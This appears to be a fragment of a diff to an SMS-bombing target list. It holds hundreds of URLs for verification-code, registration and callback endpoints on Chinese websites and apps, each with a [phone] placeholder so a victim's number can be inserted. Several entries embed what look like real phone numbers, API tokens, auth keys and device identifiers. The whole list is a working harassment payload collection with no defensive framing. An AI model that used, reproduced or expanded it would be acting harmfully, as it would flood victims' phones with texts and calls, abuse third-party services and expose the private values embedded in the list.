"http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", - "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", - "http://www.plaso.cn/plaso/servlet/randomCode?0.47652275536418554&type=loginrandom=[phone]", - "http://www.pumg.com.cn/phone.do?USERTEL=&token=bZnQLILMeWM8EF57AsIxdhwWOYyUAzSdLGLdb%2FIcj5TxIUMmRFcqAQ%3D%3D&type=0&flag=0×tamp=1548589939708telphone=[phone]", - "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", - "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.sk-vip.cn/index.php?m=&c=page&a=yunhu&phone=[phone]", - "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", - "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", - "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]", - "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", - "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", - "http://www.vatti.com.cn/index.php?m=Home&c=Api&a=[phone]", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", - "http://www.xd.com/users/sendWebRegCode?callback=jQuery110208424835141365408_1600270044866&mobile=[phone]", - "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://www.xuebangsoft.net/eduboss/CommonAction/sendVarifyCodeToPhone.do?phoneNumber=[phone]®TimeCode=1589627585503", - "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", - "http://www.youxia.cn/go/index.php?mod=account&code=getRandCode&pic_code=undefined&phone=[phone]", - "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", - "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]", - "http://www25c1.53kf.com/impl/rpc_callback_phone.php?from=api&company_id=72204003&guest_id=11199824994006&style=1&from_page=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3D3RHZQYd7M-TF4MUvr7tQD4xVSYxHv_IWj2SbNAAdoKtf_Xk51H_avXcuoOtSQIe96CW0u5SYUWmlZJPnQXRVka%26wd%3D%26eqid%3D9f6d04a1000e3ecf000000065fb824c2&talk_page=http%3A%2F%2Fwww.yueshi-edu.com%2Fvxueli%2Fsz%2F5762.html&land_page=http%253A%252F%252Fwww.yueshi-edu.com%252Fvxueli%252Fsz%252F5762.html&call=[phone]", - "http://wx.bda.com/ajax/ajax_login.php?action=[phone]", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]", - "http://z.7qi.me/index.php?call=[phone]&ok=", - "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]", - "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", - "https://account.perfma.com/api/login/authentication/v1/picCaptcha?2&phoneCaptcha=[phone]", - "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", - "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", - "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]", - "https://api.dongqiudi.com/v3/useract/app/user/postGottenlCode?phone=[phone]&requestTime=1596183059901", - "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]", - "https://api.pkg.cn/api/sms/codeaccNbr=[phone]", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]", - "https://api.taoelement.vip/account/sms/sms/captcha/[phone]", - "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]", - "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]", - "https://app-api.shop.ele.me/arena/invoke/?method=OpenAPIRegisterService.sendVerifyCode&site_id=gw_Cloudgame&geetest_challenge=&geetest_validate=&geetest_seccode=&reportData=number=[phone]", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]", - "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", - "https://app.zhuanzhuan.com/zz/transfer/getCaptcha?type=1&mobile=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=AppStore&ip=192.168.43.151&mobile=[phone]", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]", - "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]", - "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]", - "https://cloud.nucarf.com/rest/querySmsCode?phoneNum=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", - "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]", - "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]", - "https://ddt.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]", - "https://eapi.huolala.cn/?_m=account&_a=sms_code&args=%7B%22phone_no%22%3A%22[phone]", - "https://edu.10086.cn/sso/sendSmsMsg&do=get_vcode&user_mobile=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "https://fudao.qq.com/cgi-proxy/common_func/send_sms_code?phone=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]", - "https://graph.3vjia.com/captcha/mobile/REG/[phone]", - "https://gwbk.zhongan.com/dmapiv2/za-dm-insure/dm/user/sendSMGCode?mobilePhone=[phone]&from=web", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]", - "https://h5.gumipet.com/shops_sms_register?phone=[phone]", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]", - "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", - "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=bdfa0471b3354eba9d5a424121bdf37c&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", - "https://host.convertlab.com/sms/token?mobile=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "https://im.molinsoft.com/validate.jsp?randromid=0.2002692325464066mobileNumber=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "https://jdapi.jd100.com:443/uc/v1/getSMSCode?account=[phone]", - "https://jiameng.baidu.com/portal/com/captcha?ajax=1&device=pc[phone]", - "https://ka.niwodai.com/loans-mobile/validatecode.do?method=refresh&date=1557210332912interval=60&phone=[phone]", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]", - "https://khweb.easec.com.cn:12203/nImgServlet?key=0.17275703431645484&funcNo=501520&op_source=3&flow_type=twvideo&ip=&mac=&verify_code=mobile_no=[phone]", - "https://live.weaver.com.cn/homepage/createCode2?jsonpcallback=jQuery11020786823554715125_1594648708687&phonenum=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "https://login.10086.cn/chkNumberAction.action?userName=[phone]", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery1830021546042600087745_1584433571320&phone=[phone]", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303640777548241676_1579193274318&phone=[phone]", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", - "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]", - "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", - "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]", - "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=13058226398&national_code=86&from=1&bkn=1557826707&_=1596758267792", - "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", - "https://m.lubsj.com/index.php?app=member&act=send_captcha&phone_mob=[phone]", - "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]", - "https://member.chinaacc.com/api/SmsCode.shtm?jsonpCallback=success_jsonpCallback&siteId=3&mobilePhone=[phone]", - "https://mktmain.daikuan.360.cn/activity/pcguide/cdsmsCode?callback=_360jr1603842207037&mobile=[phone]", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://mobilegt.weidai.com.cn/api/v2/verify/mobile/[phone]", - "https://mp.66law.cn/Common/GetValidateCode?time=1574424867777mobilePhone=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", - "https://msgo.10010.com/lsd-message/send/captcha/phone/v1?phoneNumber=&event=mobileloginusername=86-[phone]", - "https://my.800hr.com/inc/checkcode/?width=60&high=30&size=12&tm=21m25s13&type=1&channel=2&act=getphonecode®_code=user_phone=[phone]", - "https://mzone.yqb.com/mzone-http/sms/send_sms[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", - "https://oa.dingtalk.com/omp/sms/send_check_code_img&vcode=uaiIIuNYyv&ajax=1&r=0.37962152601011057step=getverifycode&u_nme=undefined&mobi=[phone]", - "https://open.shiguangkey.com/api/udb/verifycode/get/smscode?phone=86-[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]", - "https://open.zhundao.net/api/v2/senCode?&phoneOrEmail=[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]", - "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", - "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "https://passport.chinagoldcoin.net/user/checkAuthCode?mobile=[phone]", - "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031&amp;timestamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", - "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031×tamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]", - "https://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]", - "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", - "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", - "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", - "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", - "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "https://sso.360che.com/?c=code&_0.6284588856010609&tel=code=[phone]", - "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", - "https://u.house.ifeng.com/getVerifyCode?_=0.38838852170651417&_t=1565612980&verifyCode=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", - "https://user.chinahr.com/cppt/open/msg/send/smsCode?mobile=[phone]&isVisitor=isVisitor", - "https://user.daojia.com/mobile/getcode?mobile=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]", - "https://user.zixia.com/class/CAP/codeshow.php?sid=2090&quhao=86appname=cellphonereg&action=sendcode&yzidcode=[phone]", - "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", - "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", - "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", - "https://webapi.account.mihayo.com/Api/create_mobile_captcha&gameId=[phone]", - "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", - "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", - "https://www.birdnet.cn/source/plugin/login_mobile/index.php?version=4&module=[phone]", - "https://www.diantoushi.com/user/v2/captcha?mobile=[phone]", - "https://www.gac-toyota.com.cn/sublayouts/Member%20Center/VerifyCode.aspx?random=0.6042665278484218&ws_Method=getDynamicCodeTEL_NO=[phone]", "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "http://cd.abiz.com/v3validcode?t=1604046053252¤tFindType=1&pageType=7&pn=abiz&validateCode=currentFindValue=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", "https://www.hneao.cn/gkcjzm/Sat/SendSmsCode?codetype=ZC&sjhm=17623183206&smscode=[phone]", - "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", - "https://www.midea.cn/next/user_assist/getverifycode?mobile=[phone]", - "https://www.moretickets.com/openapi/pub/photo_codes/v1/photo_code?bizCode=MTL&verifyCodeUseType=USER_LOGIN&cellphone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", - "https://www.sogou.com/websearch/phoneAddress.jsp?phoneNumber=[phone]", - "https://www.sww.com.cn/login/captcha?0.8916150596759647&sms_captcha=phone_num=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]", - "https://www.wanmeiip.com/source/class/captcha/captcha.php?0.41730894602711244validate=[phone]", - "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", - "https://www.xxwolo.com/ccsrv/apph5/sendShortMsg?phone=[phone]", - "https://www.zhufuc.com/admin/api/center/code/verifycode?ran=0.25068726233475025&type=5&verifycode=[phone]", - "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", - "https://wx.zhonghebuke.com/api/zmweb/v1/user/smsLoginCode&category=signin_or_signupphone_number=[phone]", - "http://h.zy40.cn/dx/index.php?hm=[phone]", - "http://dx.zy40.cn/dx/index.php?hm=[phone]", - "http://m.zy40.cn/dx/index.php?hm=[phone]", - "http://qqz.xiaojiangwl.com/?yChgSnXh=[phone]", - "http://cthwallet.com/en/data/dy/index.php?hm=[phone]", - "http://hezi.ainide.cn/hzq/lt213.php?hm=[phone]", - "http://zgtv.spo38.igeek.gq/aip/index3.php?hm=[phone]", - "api.php?hm=[phone]", - "http://hezi.ainide.cn/hzq/lt213.php?hm=[phone]", - "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", - "http://www.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", - "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", - "http://www.edu-edu.com/cas/web/message/send?phone=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", - "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", - "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone]", - 